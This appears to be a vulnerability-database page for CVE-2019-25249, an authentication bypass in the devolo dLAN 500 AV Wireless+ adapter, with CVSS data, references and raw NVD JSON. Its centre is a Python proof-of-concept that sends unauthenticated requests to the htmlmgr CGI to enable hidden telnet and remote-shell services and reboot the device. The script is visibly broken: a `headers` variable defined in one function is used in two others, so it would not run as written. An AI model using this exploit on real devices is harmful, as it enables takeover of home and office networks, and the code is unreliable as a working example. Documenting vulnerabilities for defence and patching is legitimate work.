CVE-2019-25249

Description

devolo dLAN 500 AV Wireless+ 3.1.0-1 contains an authentication bypass vulnerability that allows attackers to enable hidden services through the htmlmgr CGI script. Attackers can enable telnet and remote shell services, reboot the device, and gain root access without a password by manipulating system configuration parameters.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

devolo dLAN 500 AV Wireless+ 3.1.0-1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3 """ CVE-2019-25249 PoC - devolo dLAN 500 AV Wireless+ Authentication Bypass Discovered by: [email protected] """ import requests import sys target = sys.argv[1] if len(sys.argv) > 1 else "http://192.168.1.1" def enable_telnet(target): """Enable hidden telnet service via htmlmgr CGI""" url = f"{target}/htmlmgr" headers = { "Content-Type": "application/x-www-form-urlencoded" } # Bypass authentication and enable telnet data = { "action": "set_config", "telnet": "1", "telnet_port": "23" } response = requests.post(url, data=data, headers=headers, timeout=10) return response.status_code == 200 def enable_remote_shell(target): """Enable remote shell service""" url = f"{target}/htmlmgr" data = { "action": "set_config", "remote_shell": "1" } response = requests.post(url, data=data, headers=headers, timeout=10) return response.status_code == 200 def reboot_device(target): """Reboot the device""" url = f"{target}/htmlmgr" data = { "action": "reboot" } response = requests.post(url, data=data, headers=headers, timeout=10) return response.status_code == 200 if __name__ == "__main__": print(f"[*] Targeting: {target}") print("[*] Attempting to enable telnet...") if enable_telnet(target): print("[+] Telnet service enabled successfully") print("[*] Attempting to enable remote shell...") if enable_remote_shell(target): print("[+] Remote shell enabled successfully") print("[*] Rebooting device...") reboot_device(target) print("[+] Device reboot initiated")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25249
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25249
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25249/
[4] VulDB https://vuldb.com/cve/CVE-2019-25249
[5] https://www.devolo.com
[6] https://www.exploit-db.com/exploits/46325
[7] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5508.php
[8] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5508.php

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25249", "sourceIdentifier": "[email protected]", "published": "2025-12-24T20:15:53.247", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "devolo dLAN 500 AV Wireless+ 3.1.0-1 contains an authentication bypass vulnerability that allows attackers to enable hidden services through the htmlmgr CGI script. Attackers can enable telnet and remote shell services, reboot the device, and gain root access without a password by manipulating system configuration parameters."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}]}], "references": [{"url": "https://www.devolo.com", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/46325", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5508.php", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5508.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}